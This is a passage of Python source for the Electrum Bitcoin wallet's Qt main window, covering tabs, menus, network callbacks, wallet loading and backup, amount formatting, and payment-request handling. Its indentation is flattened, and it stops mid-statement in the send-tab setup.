self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 5)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once the GUI has been initialized, check whether we need to announce anything, since the callback may have fired before the GUI existed
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = 'Electrum %s - %s' % (self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction("Export", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are reserved keywords on macOS; use this as a workaround
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are more than three
tx_amount = len(self.tx_notifications)
if(tx_amount >= 3):
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
total_amount += v
self.notify(_("%(txs)s new transactions received: Total amount received in the new transactions %(amount)s") \
% { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
self.notify(_("New transaction received: %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount)
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
if self.fee_unit == 0:
return format_satoshis(fee_rate/1000, False, self.num_zeros, 0, False) + ' sat/byte'
else:
return self.format_amount(fee_rate) + ' ' + self.base_unit() + '/kB'
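# Worked example (assuming fee_rate is expressed in satoshis per kilobyte, as the /1000
# above suggests): with fee_unit == 0, a fee_rate of 150000 sat/kB corresponds to
# 150 sat/byte; otherwise it is shown per kB in the base unit (150000 sat = 1.5 mBTC
# at decimal_point == 5).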
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mBTC'
if self.decimal_point == 8:
return 'BTC'
raise Exception('Unknown base unit')
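# Quick reference for the mapping above: decimal_point 2 -> 'bits' (1 bit = 100 sat),
# 5 -> 'mBTC' (1 mBTC = 100,000 sat), 8 -> 'BTC' (1 BTC = 100,000,000 sat).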
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
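# Worked example of the two-way conversion above (assuming an exchange rate of
# 30000 fiat units per BTC): entering 15000 in fiat_e sets btc_e to
# int(15000 / 30000 * COIN) = 50,000,000 satoshis, while editing btc_e to that amount
# writes 50,000,000 * 30000 / COIN = 15000 back into fiat_e.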
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging (%d blocks)"%server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
